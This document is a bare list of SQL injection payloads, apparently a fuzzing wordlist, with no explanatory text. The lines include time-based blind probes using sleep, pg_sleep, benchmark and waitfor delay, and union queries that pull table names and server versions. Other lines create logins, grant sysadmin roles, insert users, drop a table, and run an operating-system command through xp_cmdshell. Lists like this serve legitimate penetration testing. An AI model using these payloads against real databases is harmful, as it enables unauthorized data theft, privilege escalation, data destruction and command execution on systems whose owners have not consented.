1
1\'1
1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116
1' and non_existant_table = '1
1 and user_name() = 'dbo'
1 or benchmark(10000000,MD5(1))#
1) or benchmark(10000000,MD5(1))#
1)) or benchmark(10000000,MD5(1))#
1 or pg_sleep(5)--
1) or pg_sleep(5)--
1)) or pg_sleep(5)--
1 or sleep(5)#
1) or sleep(5)#
1)) or sleep(5)#
1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --
1 uni/**/on select all from where
benchmark(10000000,MD5(1))#
'create user name identified by 'pass123' --
'create user name identified by pass123 temporary tablespace temp default tablespace users; 
\'; desc users; --
' ; drop table temp --
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
'exec sp_addlogin 'name' , 'password' --
' exec sp_addsrvrolemember 'name' , 'sysadmin' --
' grant connect to name; grant resource to name; --
'; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- 
'; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --
'; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --
'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --
'; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' --
'; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' --
'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --
'; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' --
' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --
' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
' or 1=1 --
' or benchmark(10000000,MD5(1))#
') or benchmark(10000000,MD5(1))#
')) or benchmark(10000000,MD5(1))#
" or benchmark(10000000,MD5(1))#
") or benchmark(10000000,MD5(1))#
")) or benchmark(10000000,MD5(1))#
' or pg_sleep(5)--
') or pg_sleep(5)--
')) or pg_sleep(5)--
" or pg_sleep(5)--
") or pg_sleep(5)--
")) or pg_sleep(5)--
' or sleep(5)='
' or sleep(5)#
') or sleep(5)='
')) or sleep(5)='
" or sleep(5)="
" or sleep(5)#
") or sleep(5)="
")) or sleep(5)="
' or username is not NULL or username = '
pg_sleep(5)--
sleep(5)#
' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --
' union (select NULL, NULL, NULL, NULL,  (select @@version)) --
' union (select NULL, NULL, NULL,  (select @@version)) --
' union (select NULL, NULL, (select @@version)) --
' union (select NULL, (select @@version)) --
' union (select @@version) --
;waitfor delay '0:0:5'--
';waitfor delay '0:0:5'--
');waitfor delay '0:0:5'--
'));waitfor delay '0:0:5'--
";waitfor delay '0:0:5'--
");waitfor delay '0:0:5'--
"));waitfor delay '0:0:5'--
);waitfor delay '0:0:5'--
));waitfor delay '0:0:5'--
